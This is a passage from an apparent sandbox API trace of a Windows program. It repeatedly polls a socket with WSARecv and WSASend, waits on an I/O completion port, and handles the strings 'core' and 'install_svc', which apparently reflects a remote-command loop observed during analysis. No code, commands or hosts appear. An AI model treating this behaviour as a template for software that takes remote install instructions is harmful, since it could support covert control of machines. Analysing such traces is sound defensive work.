buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0086.508] GetLastError () returned 0x3e5 [0086.508] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.508] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.509] strlen (_Str="core") returned 0x4 [0086.509] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0086.509] strlen (_Str="install_svc") returned 0xb [0086.509] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0086.509] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.509] strlen (_Str="install_svc") returned 0xb [0086.509] strlen (_Str="core") returned 0x4 [0086.509] strlen (_Str="install_svc") returned 0xb [0086.510] strlen (_Str="install_svc") returned 0xb [0086.510] GetCurrentThreadId () returned 0xac0 [0086.510] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.510] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.743] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0086.743] GetLastError () returned 0x3e5 [0086.743] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.744] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.745] strlen (_Str="core") returned 0x4 [0086.745] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0086.745] strlen (_Str="install_svc") returned 0xb [0086.745] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0086.745] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.745] strlen (_Str="install_svc") returned 0xb [0086.745] strlen (_Str="core") returned 0x4 [0086.745] strlen (_Str="install_svc") returned 0xb [0086.745] strlen (_Str="install_svc") returned 0xb [0086.745] GetCurrentThreadId () returned 0xac0 [0086.745] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.745] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.978] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0086.978] GetLastError () returned 0x3e5 [0086.978] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.979] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.980] strlen (_Str="core") returned 0x4 [0086.980] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0086.980] strlen (_Str="install_svc") returned 0xb [0086.980] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0086.980] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.980] strlen (_Str="install_svc") returned 0xb [0086.980] strlen (_Str="core") returned 0x4 [0086.980] strlen (_Str="install_svc") returned 0xb [0086.981] strlen (_Str="install_svc") returned 0xb [0086.981] GetCurrentThreadId () returned 0xac0 [0086.981] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0086.981] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.367] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0087.367] GetLastError () returned 0x3e5 [0087.367] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.368] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.369] strlen (_Str="core") returned 0x4 [0087.369] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0087.369] strlen (_Str="install_svc") returned 0xb [0087.369] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0087.370] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.370] strlen (_Str="install_svc") returned 0xb [0087.370] strlen (_Str="core") returned 0x4 [0087.370] strlen (_Str="install_svc") returned 0xb [0087.370] strlen (_Str="install_svc") returned 0xb [0087.370] GetCurrentThreadId () returned 0xac0 [0087.370] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.370] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.603] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0087.603] GetLastError () returned 0x3e5 [0087.603] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.603] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.604] strlen (_Str="core") returned 0x4 [0087.604] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0087.604] strlen (_Str="install_svc") returned 0xb [0087.604] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0087.604] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.604] strlen (_Str="install_svc") returned 0xb [0087.604] strlen (_Str="core") returned 0x4 [0087.604] strlen (_Str="install_svc") returned 0xb [0087.604] strlen (_Str="install_svc") returned 0xb [0087.604] GetCurrentThreadId () returned 0xac0 [0087.604] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.604] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.837] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0087.837] GetLastError () returned 0x3e5 [0087.837] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.837] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.838] strlen (_Str="core") returned 0x4 [0087.838] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0087.838] strlen (_Str="install_svc") returned 0xb [0087.838] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0087.838] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.838] strlen (_Str="install_svc") returned 0xb [0087.838] strlen (_Str="core") returned 0x4 [0087.839] strlen (_Str="install_svc") returned 0xb [0087.839] strlen (_Str="install_svc") returned 0xb [0087.839] GetCurrentThreadId () returned 0xac0 [0087.839] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0087.839] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.134] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0088.134] GetLastError () returned 0x3e5 [0088.134] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.135] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.136] strlen (_Str="core") returned 0x4 [0088.136] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0088.136] strlen (_Str="install_svc") returned 0xb [0088.136] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0088.136] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.136] strlen (_Str="install_svc") returned 0xb [0088.136] strlen (_Str="core") returned 0x4 [0088.136] strlen (_Str="install_svc") returned 0xb [0088.136] strlen (_Str="install_svc") returned 0xb [0088.136] GetCurrentThreadId () returned 0xac0 [0088.136] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.136] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.374] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0088.374] GetLastError () returned 0x3e5 [0088.374] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.374] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.375] strlen (_Str="core") returned 0x4 [0088.375] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0088.375] strlen (_Str="install_svc") returned 0xb [0088.375] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0088.375] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.375] strlen (_Str="install_svc") returned 0xb [0088.375] strlen (_Str="core") returned 0x4 [0088.375] strlen (_Str="install_svc") returned 0xb [0088.375] strlen (_Str="install_svc") returned 0xb [0088.375] GetCurrentThreadId () returned 0xac0 [0088.375] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.375] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.608] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0088.608] GetLastError () returned 0x3e5 [0088.608] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.609] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.611] strlen (_Str="core") returned 0x4 [0088.611] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0088.611] strlen (_Str="install_svc") returned 0xb [0088.612] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0088.612] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.612] strlen (_Str="install_svc") returned 0xb [0088.612] strlen (_Str="core") returned 0x4 [0088.612] strlen (_Str="install_svc") returned 0xb [0088.612] strlen (_Str="install_svc") returned 0xb [0088.612] GetCurrentThreadId () returned 0xac0 [0088.612] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.612] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.844] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0088.844] GetLastError () returned 0x3e5 [0088.844] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.844] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.846] strlen (_Str="core") returned 0x4 [0088.846] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x0) returned 0x0 [0088.846] strlen (_Str="install_svc") returned 0xb [0088.846] WSASend (in: s=0x214, lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), dwBufferCount=0x1, lpNumberOfBytesSent=0x0, dwFlags=0x0, lpOverlapped=0x260a15c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fd2c*=((len=0x2c, buf=0x2620d18*)), lpNumberOfBytesSent=0x0, lpOverlapped=0x260a15c) returned 0 [0088.846] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.846] strlen (_Str="install_svc") returned 0xb [0088.846] strlen (_Str="core") returned 0x4 [0088.846] strlen (_Str="install_svc") returned 0xb [0088.846] strlen (_Str="install_svc") returned 0xb [0088.846] GetCurrentThreadId () returned 0xac0 [0088.846] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0088.846] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.077] WSARecv (in: s=0x214, lpBuffers=0x516fea4, dwBufferCount=0x1, lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c, lpCompletionRoutine=0x0 | out: lpBuffers=0x516fea4*=((len=0x2800, buf=0x260a190)), lpNumberOfBytesRecvd=0x0, lpFlags=0x260c990*=0x0, lpOverlapped=0x260a13c) returned -1 [0089.077] GetLastError () returned 0x3e5 [0089.077] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50) returned 1 [0089.077] GetQueuedCompletionStatus (in: CompletionPort=0x1e0, lpNumberOfBytesTransferred=0x516ff54, lpCompletionKey=0x516ff58, lpOverlapped=0x516ff50, dwMilliseconds=0xffffffff | out: 